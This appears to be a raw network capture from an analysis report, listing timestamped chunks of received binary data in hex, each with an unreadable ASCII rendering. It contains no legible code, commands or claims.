                                                                                                                                                    2022-09-29 12:59:06 UTC10258INData Raw: e6 ff 93 49 50 af ba 3e b1 f1 40 38 31 8f 8b ec f0 07 5f 0a 38 ae 49 32 ac 5d c7 27 4a 38 01 42 47 bc a4 bb c5 82 f7 10 6f da 3e c9 09 c5 35 e3 cb a4 8d b0 71 d1 45 f0 1a 50 78 54 21 b1 46 63 42 c4 fa c6 34 45 9d 49 3a a6 5e 15 7d 47 fb 44 51 a1 db f6 68 fe 44 44 d3 4b 4f 21 b7 c8 c4 0a d4 a1 56 a4 05 76 65 fa 19 95 63 ba 79 30 3d b3 cb 02 df 61 95 32 9d 97 dc b0 b9 9b ff d3 53 7d d3 5d a9 e0 68 27 ef c5 56 a2 68 11 f3 79 4d cd 47 c1 a5 4a f6 04 b6 2d 02 c3 a0 ce ba 0e 0c c9 ab f5 39 49 53 22 18 4b 6c f7 e2 ef a8 70 30 ab 84 29 60 a5 f7 57 62 f0 ca f3 d2 27 39 f8 63 e7 7c 7e 7c 94 84 5d 9e e4 fe 92 39 32 51 78 e6 2f 11 2d 22 61 ec d7 07 40 71 f5 5b e0 d9 1b da 38 d5 6b 3e c7 b0 a6 5c f7 12 17 4a 6e 0a bb b1 2f 8c 00 c9 56 d9 11 26 d9 e6 51 fd 66 82 e8 ce
                                                                                                                                                    Data Ascii: IP>@81_8I2]'J8BGo>5qEPxT!FcB4EI:^}GDQhDDKO!Vvecy0=a2S}]h'VhyMGJ-9IS"Klp0)`Wb'9c|~|]92Qx/-"a@q[8k>\Jn/V&Qf
                                                                                                                                                    2022-09-29 12:59:06 UTC10268INData Raw: 84 8f f6 bd c9 a7 b1 be af 06 6a 08 e6 04 2a a4 1d 2e dc ff b4 85 3c 4b 20 38 64 a2 52 23 72 23 b5 db 83 64 b2 11 e3 45 bf 1e 6e b2 e4 76 24 28 a7 ab 4d 84 e2 1f 80 36 fd 1b 2b 77 ea 48 a6 63 7a 82 2e c9 4a a4 47 a6 07 08 a4 20 41 65 69 99 f5 91 a4 9a 42 61 30 a2 03 f6 c0 88 5a 5c 9c 1a b1 80 1b f5 16 61 10 02 cb 64 56 cd 03 14 39 a4 cd a0 9c 0e 51 29 36 5f 65 60 ee f5 ce 5e 25 71 22 18 b7 c1 b3 85 ab 42 62 f6 dc 05 82 18 4f a6 a1 90 36 99 56 4c 4c ae 8c 3a 4e 30 a2 ac 5c 21 75 07 f3 35 3d 5c 5a 49 85 d0 90 93 f7 b3 9d 01 7f 06 0c 3b 51 60 d1 2f 08 10 33 25 ac 04 d9 25 64 ff 06 8f 7b f8 3d bc f3 32 88 f1 c9 29 c2 2f c6 f5 34 20 a6 37 7f a2 66 c7 9f 01 a4 0b e2 d5 02 23 b1 f2 76 34 9f 29 1d 3b 7e 4b 43 ea 54 48 77 80 29 f4 73 ef bf 83 a8 d4 fd 6c 01 a1 2c
                                                                                                                                                    Data Ascii: j*.<K 8dR#r#dEnv$(M6+wHcz.JG AeiBa0Z\adV9Q)6_e`^%q"BbO6VLL:N0\!u5=\ZI;Q`/3%%d{=2)/4 7f#v4);~KCTHw)sl,
                                                                                                                                                    2022-09-29 12:59:06 UTC10284INData Raw: ab 30 0c 52 18 7d 2e ec db 29 24 12 47 29 6c 31 98 3f 00 bf ae 61 98 2e cd 95 3e 0e df 7a b0 62 b9 aa 1a 8e 25 c9 70 72 b9 13 0e 77 f2 0c 1f 29 e7 9e af ba 8d 49 5b c5 80 d2 5d 62 84 1c c4 86 07 5a 1b 57 ed ec 86 99 27 85 a9 e7 1a 32 a6 46 d8 92 8c 88 ff ab 51 9d 7b 79 f8 e9 54 ff 64 7e 21 f5 97 c8 3a a2 24 7f 7f 14 81 a6 4d b4 b1 68 3f 60 bb 1d b0 b7 72 1c d2 62 19 87 c1 2b f9 66 66 3a 7d dc ab 24 a3 9f 1d af 1e c8 e0 ad 1d 87 a6 90 08 70 20 f4 ac 5e c4 6a 4c 47 97 da 70 b4 1a 78 13 93 8c e4 e6 e3 c3 47 31 af 2e f2 b1 e3 f6 f0 fb eb 07 f5 47 62 9f 1f d0 de 25 f5 4c e6 2e 65 e1 11 87 bd f0 47 79 eb 32 cd e3 4f 92 ae b4 a9 36 f8 d4 6e cf af c2 d6 db ac 55 35 79 74 1e ba d0 b9 da 86 cb 85 b1 9d 54 bc ed 1a 0d c6 aa 8b 63 2a 6e ee 33 91 05 67 69 e9 58 f3 ad
                                                                                                                                                    Data Ascii: 0R}.)$G)l1?a.>zb%prw)I[]bZW'2FQ{yTd~!:$Mh?`rb+ff:}$p ^jLGpxG1.Gb%L.eGy2O6nU5ytTc*n3giX
                                                                                                                                                    2022-09-29 12:59:06 UTC10300INData Raw: 2b c6 75 f4 4a b3 a3 06 85 c7 9e 6b 7c 77 a7 b2 f7 75 cf 01 4c 8f 64 27 84 ac 13 79 72 26 51 2f cd b4 b2 97 8e 2a 04 3b 7f c1 65 bd ce c8 3b 2a a4 36 30 76 52 c6 8f f7 3a bb ae d6 5a 93 ed 61 90 a3 43 0a 29 c3 78 6a d5 26 94 00 ab 8b a6 c0 04 75 6b 31 5c c6 48 13 77 a3 69 f2 9a 87 d5 bb 13 ab 28 35 86 c8 d4 30 07 6b 71 3c 92 90 89 f9 bc 65 4b af 2c bb 80 ee 4d a1 7f 3b 8d e2 bf 42 f0 f2 a6 a8 f7 8f 18 cb 60 03 60 e6 b2 03 79 0d b3 d8 28 db 92 3a 88 da 9f 27 84 bf 93 07 30 17 95 61 d2 4e 2c 21 40 d8 de e1 d7 9b 80 49 3d ee b7 d1 15 dd 86 79 ff 07 20 15 97 fe 9c 85 ee 61 9f 7b 02 39 a1 63 56 42 3a 7d 8a 12 58 3e f6 47 4a 1c 54 a8 63 48 cc 30 fb 7e ed da 53 24 8e a9 79 68 ec 49 7b 88 ba b6 f3 3f 54 61 12 6b eb ea 8f ca 76 27 6c e5 c3 36 90 b9 63 48 8d e3 66
                                                                                                                                                    Data Ascii: +uJk|wuLd'yr&Q/*;e;*60vR:ZaC)xj&uk1\Hwi(50kq<eK,M;B``y(:'0aN,!@I=y a{9cVB:}X>GJTcH0~S$yhI{?Takv'l6cHf
                                                                                                                                                    2022-09-29 12:59:06 UTC10316INData Raw: 0b 1e b6 9f 95 a0 65 e6 59 b7 88 74 07 39 97 16 d6 5b ea 29 ec bb 65 cc 0d e9 18 1a bb ff 3a bf 4a 15 e9 aa 73 9e b3 e5 12 dd 59 1b be 18 c4 fc 0c 29 06 dc fd 7f 74 b4 05 b1 a1 17 24 2b b5 94 67 d2 44 7a b5 2b 17 54 fa e2 27 09 1d a2 6a 6e 64 7e 68 9f 0a f8 9f d2 99 e9 30 02 e5 61 7a ca 3d 9f e2 71 13 93 e8 a2 1d ea 7a 88 5d cf 1e e9 7e 74 b2 1c f9 2c cb 17 77 4c 7e 4f 52 e6 ab 12 d7 e1 35 35 35 e6 a5 65 99 82 6b 4c ac 4e 56 17 07 43 de 27 e7 61 4a 73 a2 36 17 49 ed 42 8d 0a 9a 45 f0 46 a8 3f d9 b0 e9 1d 47 20 60 07 62 15 32 7b 30 2f 9e 4f ca 97 14 a6 32 08 81 b8 4d 09 fb 84 21 11 fb c4 99 45 a7 18 b3 9c 30 cc 5a 38 3d 8a d1 cc 2c 07 e0 c9 68 60 da ec 0b 8f aa bf 55 8d da c9 c8 0a d4 39 02 ae 9c e5 3f 22 0c 69 6d ae 0f 0a 4e 77 bd 63 fb f4 d3 b9 ab 12 fe
                                                                                                                                                    Data Ascii: eYt9[)e:JsY)t$+gDz+T'jnd~h0az=qz]~t,wL~OR555ekLNVC'aJs6IBEF?G `b2{0/O2M!E0Z8=,h`U9?"imNwc
                                                                                                                                                    2022-09-29 12:59:06 UTC10332INData Raw: 44 af 80 01 79 f8 d8 19 3d 65 39 b1 c9 d3 f2 c5 c4 aa 7b 06 bb e1 a7 2a 9d 09 0e a8 e2 d7 c2 9a 50 49 7a 14 e0 c6 bf 84 5c 19 17 2f 6a 4a 25 8c 6d f7 53 52 ca 05 52 69 b9 84 77 53 9a 46 b4 ae 53 c2 13 52 39 99 a3 e3 8f b8 44 d1 1d 3c a8 11 8b f9 8f 17 9a 0e 32 c8 aa 7f 0d 15 a5 40 d6 60 f2 84 4a c1 98 7d 6e ae 6a 5d ab ee 7b 59 9f ad a8 cc 73 ff 5d 9c 1d ea f8 8f d3 6c 34 12 f1 78 d6 63 cb d8 09 3a aa 6c 12 b8 08 d1 65 8d 7c d9 c4 08 20 4f b9 99 b6 2e 78 09 68 f3 16 28 c2 4d 1f 21 2a 6e d7 5d 81 03 8e 5a 21 6a 29 09 a9 73 63 ab 4f ec e1 fb 7d 39 44 0c d5 d2 c7 ac 04 63 2e f5 0f 22 f0 10 9b ad ac 07 98 9e 0b be 76 8f 21 84 28 e9 0a 6c 71 8c 49 13 1d 56 e0 89 7f 95 e6 56 94 88 0d 45 6a 98 29 d5 1c ed 83 4b 55 4d 4d 75 d4 10 80 3a 1e 9c c5 ec 5c 46 68 93 cb
                                                                                                                                                    Data Ascii: Dy=e9{*PIz\/jJ%mSRRiwSFSR9D<2@`J}nj]{Ys]l4xc:le| O.xh(M!*n]Z!j)scO}9Dc."v!(lqIVVEj)KUMMu:\Fh
                                                                                                                                                    2022-09-29 12:59:06 UTC10348INData Raw: 30 b0 fe 31 ed da df e2 99 e3 b3 49 37 0c c0 23 be 61 b8 11 36 e3 46 00 af 80 d3 99 b5 d6 5c 8f 90 fc 93 97 a2 bc 61 9a bb 80 3e 85 42 53 97 3d d3 6c 9a e8 fe 88 84 35 8e d1 6b 31 16 c2 9b 41 f1 6e 09 53 94 80 8d a4 28 09 58 7f 33 ae e9 d6 73 d1 99 e8 7a b5 fa d8 79 b8 c6 cc e4 b9 5f 01 c0 96 f1 10 59 30 8c 4f f7 80 73 34 9c 2f 5c 75 80 a9 63 38 20 1c 9a 46 3b 2c 98 40 ba 12 35 86 6c 26 f7 f1 ef 79 86 a2 ba 68 6f 4a f8 74 05 97 91 4e ac 23 d6 a6 f8 35 9c 80 5c 4c 95 57 bd 15 f2 7e bf 79 08 cd 0f f3 6a 2b 6a 9b 59 97 ef 50 49 18 ff a6 ad d8 01 37 7d 1c 73 cc c7 26 75 19 40 50 24 8a b1 06 bc 28 70 bd 71 8f 73 80 80 b7 bf 3c 9b ef 03 30 8a 50 4e d1 41 59 f6 cb 06 38 7c be 3c 72 b8 8e f2 02 95 62 59 8b e0 85 f6 32 99 43 ab 38 cf 65 64 da 92 13 a3 92 d6 01 c1
                                                                                                                                                    Data Ascii: 01I7#a6F\a>BS=l5k1AnS(X3szy_Y0Os4/\uc8 F;,@5l&yhoJtN#5\LW~yj+jYPI7}s&u@P$(pqs<0PNAY8|<rbY2C8ed
                                                                                                                                                    2022-09-29 12:59:06 UTC10364INData Raw: 2f 8c 2e 98 b2 7f c1 11 dc 76 aa 03 d0 93 b7 4c 25 9c 65 2a c7 86 71 0f 99 ae ce cc 6b 7d 26 d4 9e b5 f0 36 f2 33 c6 9a e8 a8 df 42 2a d3 84 f3 c4 65 6f ea e8 bd 2f 8e 17 d8 64 1d 89 c1 7e be c5 18 91 25 15 45 e2 45 a6 4f 09 8c 7b 6c 5c d3 55 c7 fb 67 dc 74 0f aa 76 2a bf e2 99 3e 4b e0 94 0f 3c a6 58 a7 ef 53 3e 0c 73 0b b0 4b 7b 32 52 1f 88 3d d7 c7 16 02 14 ec 1c 4d 88 9e 7f 13 51 7e 4f 6d 3d 1c d7 1e 1b 21 37 53 6d 03 69 8f 03 a9 5b 29 42 8f bb 2c 63 57 c6 97 4a c6 72 e0 6c 63 13 0f 77 06 76 0a 85 76 f6 f3 34 c0 d5 e8 0c b5 65 07 bb 12 be 57 2f 61 59 3b fd 7d c1 87 aa 3f 75 a1 65 25 6f a4 d4 74 db 12 31 38 ac 17 e5 cf e2 5b a6 9e 5c bd fd 8e 8f 81 9e 5e 0d 1d 98 62 6c 0c 0b 6e 6e 15 1c d2 1b 6b 06 ad 49 8a 99 73 2c f6 bf 3d e3 43 b9 cd 10 37 9b fe f1
                                                                                                                                                    Data Ascii: /.vL%e*qk}&63B*eo/d~%EEO{l\Ugtv*>K<XS>sK{2R=MQ~Om=!7Smi[)B,cWJrlcwvv4eW/aY;}?ue%ot18[\^blnnkIs,=C7
                                                                                                                                                    2022-09-29 12:59:06 UTC10380INData Raw: 81 70 9a b9 48 5c 92 8d 0e 70 8d 4c b3 bc 58 18 ff f2 a8 4a 72 6b 67 b6 14 4a 54 aa f7 1d 85 50 ec ce 85 27 61 a5 bf df 2f 79 36 bc 3c fe 97 1c 06 3a c6 3e e7 8c 9b 8e 89 ce 8a 77 26 ca 7e 90 39 d1 86 e0 6a 85 9c 1a 05 1b 7a 96 90 14 2e b8 07 d4 6c 88 8b b7 b2 69 0c 7e 16 73 88 06 a5 a3 f6 fb 92 fd ec 71 e0 e7 d7 8a 8d 41 05 53 1e 82 2a 24 8b 15 63 66 db bf 34 c3 37 4b d2 48 07 5e c7 d1 a9 eb 0e b9 4d 75 77 ba a8 99 82 b9 6b 36 72 d5 11 c8 be ec 6e 6e a3 0a c4 79 9b c3 e1 40 23 05 83 cc a2 86 cf da 61 d4 9f 6b cf f1 eb d4 72 2d 59 ff 5c 0e 18 5c a8 87 63 c6 44 65 11 70 d2 ae d7 38 59 2c 8c 2e 87 08 c1 2c 0e 1d fa cc 4e 31 b9 0d 95 14 42 d0 72 0b 39 33 04 7b 22 8d 3f a6 01 a6 b7 6e 80 98 9f 2c b9 ad 55 9b b2 14 ee 4a a9 3c 9f 92 92 ab 65 f7 76 2a 14 03 14
                                                                                                                                                    Data Ascii: pH\pLXJrkgJTP'a/y6<:>w&~9jz.li~sqAS*$cf47KH^Muwk6rnny@#akr-Y\\cDep8Y,.,N1Br93{"?n,UJ<ev*
                                                                                                                                                    2022-09-29 12:59:06 UTC10396INData Raw: 16 7e f7 eb 3b 37 e0 cd 16 c7 6f ea 78 30 e0 dd 24 92 9e 42 25 53 71 13 12 5e 87 f2 de a1 12 9f ac dc b6 39 0c 7a 05 82 2b 54 84 bf 3c f6 46 5a e4 52 67 0e af 83 6e 9b 2d 30 86 cd 39 1c a2 4b 0e e2 14 df 32 4f d9 ea b4 ac 3c f4 e0 90 17 9e 94 0a eb db 09 06 ea f0 e6 b1 74 41 20 2e 72 c1 12 6f 6b bc e5 2c 3f f4 47 c2 fa 72 bd 6d 66 57 02 df 3f 18 e2 3d 29 ed b9 17 d7 66 98 b5 de d2 06 b0 ee 9e 57 1e 81 66 c8 ab 71 6c cc 4c 72 ee 42 3b cd a6 8d af 3b 8f 3b cd de d2 57 87 1a 2c 48 7b 9a 1e da af 0a 2b da ec b8 e6 35 2a bf 1e 7e 0d 55 6e 1a 37 cf e8 ac 26 c9 8b 99 9a 60 33 83 f3 75 c8 99 6b 34 dd b5 81 07 ad e9 4c 96 d9 b0 51 02 69 2a 83 fd ac 65 c1 fb 36 64 6a 1d 46 65 a1 fe 29 b5 0f 28 4c 81 68 b5 3e 49 a8 48 49 76 57 8b 00 50 72 fa e2 be 45 0b cd 64 45 a8
                                                                                                                                                    Data Ascii: ~;7ox0$B%Sq^9z+T<FZRgn-09K2O<tA .rok,?GrmfW?=)fWfqlLrB;;;W,H{+5*~Un7&`3uk4LQi*e6djFe)(Lh>IHIvWPrEdE
                                                                                                                                                    2022-09-29 12:59:06 UTC10412INData Raw: 61 14 74 b3 d5 8e 5b 78 d7 f6 83 16 ea 41 af c2 e5 48 38 8b 79 1f 9c 33 13 f0 d1 83 da 48 bc aa 2a f3 4c 05 a1 8b bb 00 ec a1 32 b3 61 96 85 4b 4b 9b 96 2c 0a ff 68 55 aa 58 79 7a ba d7 27 cc 77 fa 85 05 e3 08 cb f3 c4 d4 56 45 0c 57 6a 11 b3 24 0d 71 d0 4c 2c 0e f4 13 8f 79 6f 42 4a 44 11 f7 7f f6 00 84 ad 4b b6 be e4 96 cd 41 c9 87 1e 63 e4 43 97 be 64 d6 75 a2 60 07 4e f0 1c 66 9a 32 c4 2d 7c 27 9d d0 b8 e1 1f e1 16 18 43 6b 13 6b 67 e4 d9 ca b7 f5 7f 90 ae 78 d7 05 73 1e fc 8d 25 3b 9e ba 89 47 d5 f7 92 b6 1d b4 18 f0 82 5c fb 9e 31 2e f9 c4 85 5f be 30 23 c2 f9 32 60 ab 59 bb 5d 37 79 62 b3 3b d2 f1 44 6f 0e 29 a5 78 3c d6 71 a7 f9 05 2b 02 40 eb a4 d3 8c 2f d2 37 fc 9d f2 8e f3 85 05 3d ac 60 9d 8d 6d 52 2e 57 cd 64 c2 32 a1 00 16 e7 a3 ed 40 24 16
                                                                                                                                                    Data Ascii: at[xAH8y3H*L2aKK,hUXyz'wVEWj$qL,yoBJDKAcCdu`Nf2-|'Ckkgxs%;G\1._0#2`Y]7yb;Do)x<q+@/7=`mR.Wd2@$
                                                                                                                                                    2022-09-29 12:59:06 UTC10428INData Raw: ac 18 c7 b0 62 08 1b c1 57 ab 33 4f f2 a9 f1 21 83 1f 16 77 83 c0 28 66 2a 46 cb 04 62 60 ce 5d 8d 19 56 42 15 53 5b 7f 6e c7 8e 01 fe 38 63 b9 10 3a e9 80 7e 56 81 31 c7 14 56 7b ac 67 c0 7b 2d 14 a3 9e 79 95 3b 3e 86 7f 71 99 a4 c7 32 8a 36 47 80 50 38 56 c4 b6 65 ee 26 27 eb b7 5f 07 65 40 8b 82 00 e9 91 f6 0f 6c 75 b0 41 ed 54 3b ca 87 ac 77 ac 26 fc 40 36 5d 32 d6 0c 1b 69 b2 9b 3b 9c ad fa 52 0e 16 fa 95 41 59 94 00 1c ac d9 4d b0 89 6d 6e 9d 39 99 07 a4 1f 8b 18 c2 8f 0c 37 61 37 0f 14 2b 03 a8 0a 57 45 20 cb 81 7a bc 79 75 68 da 99 58 20 66 98 fe 9f 17 31 b3 e9 a3 41 d5 6b a5 68 95 a4 4f 74 e3 01 55 01 4f 50 7d 8a b5 67 19 b1 af fe 62 51 ba 96 12 52 50 75 02 73 7d 34 76 64 e3 a6 7f fa d5 5d 63 4b 07 10 f7 9a 10 f5 13 52 a8 bd 70 eb 00 a7 76 de 19
                                                                                                                                                    Data Ascii: bW3O!w(f*Fb`]VBS[n8c:~V1V{g{-y;>q26GP8Ve&'_e@luAT;w&@6]2i;RAYMmn97a7+WE zyuhX f1AkhOtUOP}gbQRPus}4vd]cKRpv
                                                                                                                                                    2022-09-29 12:59:06 UTC10444INData Raw: 47 b7 6c 46 ec 32 6b c1 a0 f4 ac b9 fe c2 32 b2 a7 a7 e1 26 7f b1 db 02 49 a1 6d 66 b4 bf 80 39 28 65 8a 32 d5 2d d2 1a 8c 9f 17 c8 cb 9f 8b 3e 00 02 c0 cf 29 43 0c 4a 3a 54 f8 44 7e 45 e3 9f 3a 78 14 45 7a 9c 6b 9e 1b 51 53 55 68 b3 04 8c 0b 4c 58 90 57 d5 6d 17 09 75 92 ca 4c 6d 67 ac b9 5e a1 19 0e a3 5b 51 c2 eb 05 66 be 26 46 fa b1 c9 99 63 2e c6 4d 44 82 e2 a7 e2 0b ca 28 6d d9 d5 09 3f db c9 76 ce 58 dc 60 30 99 ba 24 d6 2d a8 31 fd 4f 42 fb 52 84 bd 7c 77 a4 83 9b 4e b7 e2 34 64 60 88 2f 78 68 0f ca b1 de a2 21 1a 33 46 d6 7c 1a d8 aa 48 95 1a b5 01 32 05 a3 b3 e0 60 6a 45 ca 18 88 40 02 f6 b5 91 3b 83 e6 32 db 51 7b 10 53 2f fa 52 2c 1e f3 fd ef 59 94 ba e3 a3 2d fa b4 cc 45 53 01 16 5b d3 d4 9f be 90 f3 a1 86 d4 dc 58 06 4e 64 cd 87 c6 42 5a 7f
                                                                                                                                                    Data Ascii: GlF2k2&Imf9(e2->)CJ:TD~E:xEzkQSUhLXWmuLmg^[Qf&Fc.MD(m?vX`0$-1OBR|wN4d`/xh!3F|H2`jE@;2Q{S/R,Y-ES[XNdBZ
                                                                                                                                                    2022-09-29 12:59:06 UTC10460INData Raw: 14 d2 95 55 fe 13 d0 8e 2d 4a 37 7b 47 a5 14 6f d9 a7 25 5f 80 2b 05 6c 16 11 ea 40 a1 bc c7 7f 61 0f 57 c3 8c cc 5e f4 18 ad fc 66 21 ae c5 d4 5d 86 29 b9 93 3f f9 05 92 93 5b 25 08 6c de 7b 18 27 03 bf 93 85 09 c6 38 2b bc 71 6c 90 b5 f1 fc 83 da 5a ba ad 30 f9 ad 78 da 9e 67 0c 9e 64 7d d8 cc 70 5f 7e b1 e5 66 d4 54 bb ec e0 82 8e b3 58 f1 23 a8 3f ef 1a 63 65 03 a9 01 1b 1f e0 e1 62 cb 17 5d 74 2a 45 47 13 bb 6f 92 f4 02 fd 39 22 ef dd 5a 45 70 36 ad f6 ee 20 b3 d3 5e 30 e9 f1 87 5b 03 6e 78 0a 62 14 c3 89 49 eb ab c6 6e c9 75 1e 42 60 df 3a ba 23 cb 6f 4d 81 e8 81 d8 0f 92 fe 2b ab 47 c2 5d 7c 39 49 e5 30 a7 1a c8 21 3e af 5f d6 09 3b 24 4d 3f d8 99 09 28 a2 ce 24 e9 d5 c2 f9 bf 86 a4 ce 04 2e 38 c8 ed 3b 6c ad 4a 68 4a 74 7c de 2e 5a dc be 15 4d 95
                                                                                                                                                    Data Ascii: U-J7{Go%_+l@aW^f!])?[%l{'8+qlZ0xgd}p_~fTX#?ceb]t*EGo9"ZEp6 ^0[nxbInuB`:#oM+G]|9I0!>_;$M?($.8;lJhJt|.ZM
                                                                                                                                                    2022-09-29 12:59:06 UTC10476INData Raw: 1f 42 25 be b4 4f 28 71 d8 29 9a bb d5 46 4d 4d b3 0f cc a8 0d 73 4c ed 17 8a ff 00 05 5c da e7 b0 f3 93 93 dc 04 bd 48 36 ab 3d f8 c8 41 b0 66 d7 33 b1 7e d8 ce 08 8b ac 0d 57 eb 09 57 9e 1d a4 c6 07 46 8b 38 d4 9a f4 44 fc cb 9c 8d d1 f0 ad e4 68 b3 1f 02 0d a1 19 d0 31 43 61 3a d9 d7 d2 44 34 26 fc bc 30 ed 97 cf c4 86 0f e6 b5 e7 2b 19 a8 a3 a3 ba c2 a4 38 4d df f0 b9 78 4a b6 9a 04 51 15 c5 3b 32 5e 49 64 b4 74 74 2d 0c e5 90 d7 bc 46 63 98 4d 82 89 72 b9 67 a5 c9 40 53 ed e8 12 8e 0f a8 00 c7 58 ab af 4c 5e a3 11 55 3e 7a bf 54 91 82 68 b7 db 70 cf 26 a3 0c 9e 18 7f 1a 94 fe 34 da ca b5 ff 57 e4 17 66 d3 d0 48 37 6e a6 28 71 da e4 f2 67 23 da e7 6f 26 c0 b8 da 09 0b 5a c6 15 62 94 5e c0 65 af cd 6b 13 98 77 f4 cf 06 9b 66 0a 1a e2 10 9e 66 85 e1 ed
                                                                                                                                                    Data Ascii: B%O(q)FMMsL\H6=Af3~WWF8Dh1Ca:D4&0+8MxJQ;2^Idtt-FcMrg@SXL^U>zThp&4WfH7n(qg#o&Zb^ekwff
                                                                                                                                                    2022-09-29 12:59:06 UTC10492INData Raw: 72 d4 8a 31 95 37 c6 3a 44 44 34 35 2e 2e a1 65 dd 0c 09 ef 60 5b 0e 42 f4 01 f0 95 1d a6 f2 1f c7 b3 72 79 22 e7 86 1d c8 4f 55 f4 90 bc 14 f4 ee 9f e5 3c 78 ef 7d 53 e2 4f 2d ae f6 3b 60 ed 76 f6 6e fd 1e 64 15 76 5b 8d 33 fc 67 3b f0 13 b6 c4 4c 2a 68 dc 48 01 cc 08 ba 39 08 ac c6 89 a4 9d f5 a6 b3 1e ec 09 1e f9 60 be 7b 39 85 7e b6 81 ac eb fd db ac 79 d2 b6 28 1a fa af 44 76 9e 7d 07 43 a5 9e 65 6e ee 4e 0e 0b 7d c0 3a bd b8 0d 2e 06 e3 a4 37 67 25 f3 cd be 9b 99 d0 9f c0 bd e6 be c5 b8 cd 49 78 1c 70 7c 9b 40 ac 24 cc c3 43 0b 80 6d 2b 33 89 40 e3 f3 9f a2 32 47 16 0f b1 a0 13 bd c8 19 5d 70 e9 70 8d e3 9a 7c 2c ab 73 fb 84 c8 06 11 0f be ac 54 2b 5a c2 22 89 b5 e1 74 29 ab 87 89 57 d6 2e bf 5f fe 02 04 d5 a4 67 f7 1d a7 0e 43 0e 45 39 5e 6d 0e c3
                                                                                                                                                    Data Ascii: r17:DD45..e`[Bry"OU<x}SO-;`vndv[3g;L*hH9`{9~y(Dv}CenN}:.7g%Ixp|@$Cm+3@2G]pp|,sT+Z"t)W._gCE9^m
                                                                                                                                                    2022-09-29 12:59:06 UTC10508INData Raw: 0d f8 43 7c 39 ce 6d 88 96 9b 94 33 0c b9 bd 31 fb fe 00 aa 96 89 c3 17 a9 29 8e 3a 24 ef c4 22 fc 2f 50 9d ea 4d cb bb 7c a8 d4 fa 0b 05 d7 f4 d5 fd d5 0c 65 83 ec 6b 70 f3 84 33 a8 da fc d4 39 6a 42 0a 88 47 99 bb 66 fd 55 2f 57 b3 fc 7b 20 95 60 80 94 e7 3c 2e 5d 62 9d 02 87 d7 25 83 79 03 20 e4 fc 3f 17 25 4c 84 9a 05 d9 6c 39 47 a2 67 6f 65 2e 05 0b 26 98 59 a3 7f 56 ab c0 01 35 0c d6 f5 78 3f fa 44 9e 45 74 cd 2c 30 6c 32 e0 76 55 a5 04 4e f1 54 69 f7 17 11 f1 b9 35 31 77 27 aa ae 64 41 34 fc 86 11 d9 6e b9 e2 99 2c 65 26 bd 0c 77 3e a1 55 60 e7 0c 17 07 26 f6 09 6d 7d 9f 01 01 c5 45 fd 05 fc 33 24 6d 82 6b b9 4b 69 b6 4d 1b a0 df d3 d5 00 fc a8 92 f8 79 47 33 4e 2d e4 36 69 18 ca ed c2 1a 10 b5 21 07 44 f0 fe 3e 0f 04 60 8b db 1f 06 02 55 ac 67 e6
                                                                                                                                                    Data Ascii: C|9m31):$"/PM|ekp39jBGfU/W{ `<.]b%y ?%Ll9Ggoe.&YV5x?DEt,0l2vUNTi51w'dA4n,e&w>U`&m}E3$mkKiMyG3N-6i!D>`Ug
                                                                                                                                                    2022-09-29 12:59:06 UTC10524INData Raw: 88 b3 20 c6 00 64 36 df 30 0d d5 b7 2a 51 14 fc e5 ff d2 32 c0 fd e6 51 58 07 da 30 f3 57 68 42 49 23 20 0d e3 63 9f 34 e6 11 3d 09 7d 5f c0 96 87 fd c2 54 e7 87 f6 fa a9 4d 75 42 76 22 c6 1d 71 aa e3 1d 63 05 df b6 2e 52 08 d8 06 69 da 2f ca dd 01 58 34 95 a8 ca 10 24 e8 aa 88 21 0b f9 18 13 d8 88 ab 34 39 52 fd 44 d0 70 47 ef c4 3d 85 81 be 06 c5 78 8e b8 96 a1 d8 2e 2a c8 be e8 2d 04 93 8a dd 88 0e 77 27 fd 20 5d 8b 39 73 9e 5d b5 4b 02 23 51 85 d8 91 95 4d 50 71 9f b0 62 62 1b 8f 02 4a 52 27 f8 b4 4c 14 5b 18 61 cb cf 1e a6 c4 77 d1 5a e9 8e 96 7c de 06 aa c4 20 68 f8 cd e7 1c 34 a2 29 12 d6 cb 31 d0 36 27 78 cb d1 1f 72 13 1d 03 1e ff 25 41 78 a7 80 6e 7f e2 d9 f7 19 33 9d ff 95 6d 8b 73 cb 5b 0f 8f fa 69 4f 27 b0 fb 94 e2 03 de 1d 38 eb da 34 3c 23
                                                                                                                                                    Data Ascii: d60*Q2QX0WhBI# c4=}_TMuBv"qc.Ri/X4$!49RDpG=x.*-w' ]9s]K#QMPqbbJR'L[awZ| h4)16'xr%Axn3ms[iO'84<#
                                                                                                                                                    2022-09-29 12:59:06 UTC10540INData Raw: 80 71 ad b9 8b 5f 8e 3d 62 dd 25 2e 9a c0 62 12 5c 57 38 d7 61 45 76 50 c2 8a 26 ea 9a 79 13 70 7a a8 a0 7d d4 70 28 fd ef 21 78 38 fb 90 ac 58 07 2c 7b da e1 de a7 50 2d f4 e9 79 f5 ac 5d 4b ee f1 7e b2 dd aa ac a6 b7 bc 1f 5b 87 7a 1e a3 fd df 53 f6 3b 57 c9 c2 b5 4b e4 6c 16 8e fa 5e 4a 4d f6 3b 1f 15 ef a9 78 6d b5 f4 bb 6f f8 40 08 8f 61 0e b0 96 9f 33 1b 1a 9c ff 40 8b 59 80 ca 90 c2 e9 8c ed d2 6d cd c8 60 f7 22 ea 94 b3 d4 d0 c8 09 8d cb 22 c5 88 a3 99 e1 82 53 3a a3 91 23 4c 77 63 5a 4e 9f 20 ce 64 43 ad 26 88 c8 46 28 22 3f ee 37 51 37 85 66 04 71 a0 0d aa dc 02 53 f7 82 a3 d3 eb a3 59 2e c5 87 aa f3 6d d0 c4 b0 1e 20 6a 64 4f 06 67 10 57 88 a9 1b eb 8f 09 a4 8b a5 5f 2b 79 18 4d ec 2e b9 59 69 ad 49 0e de 2a b8 92 35 5a 8d cb b2 69 a9 6b 37 c8
                                                                                                                                                    Data Ascii: q_=b%.b\W8aEvP&ypz}p(!x8X,{P-y]K~[zS;WKl^JM;xmo@a3@Ym`""S:#LwcZN dC&F("?7Q7fqSY.m jdOgW_+yM.YiI*5Zik7
